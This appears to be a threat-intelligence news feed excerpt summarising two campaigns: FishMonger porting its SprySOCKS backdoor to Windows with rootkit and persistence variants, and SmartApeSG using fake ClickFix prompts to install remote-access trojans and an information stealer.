FILTERING BY: CLEAR FILTER

FishMonger Espionage Group Porting SprySOCKS Backdoor to Windows

The China-aligned threat actor FishMonger has significantly expanded its operational reach by porting its SprySOCKS backdoor from Linux to Windows. This evolution introduces two specialized Windows-native variants: WIN_DRV, which utilizes a kernel-level rootkit for advanced activity concealment, and WIN_PLUS, which implements Windows-native persistence mechanisms. By leveraging kernel-mode drivers, the group aims to bypass traditional Endpoint Detection and Response (EDR) and Antivirus (AV) software. The malware employs hard-coded Command and Control (C2) configurations over TCP and UDP protocols, facilitating long-term, stealthy espionage and persistent access within targeted enterprise Windows infrastructures.

SmartApeSG Campaign Targets Windows Hosts via ClickFix Social Engineering

The SmartApeSG threat actor group is executing a high-severity social engineering campaign leveraging "ClickFix" scripts to compromise Windows environments. By deploying deceptive browser error messages, fake CAPTCHA prompts, and fraudulent verification pages, the actors manipulate users into executing malicious scripts through manual interaction. These scripts facilitate the deployment of diverse high-impact payloads, specifically Remcos RAT, NetSupport RAT, and the Stealc v2 information stealer. Successful infection provides attackers with persistent remote system control, capabilities for large-scale credential harvesting, and a critical foothold for lateral movement within enterprise networks.


LINK COPIED TO CLIPBOARD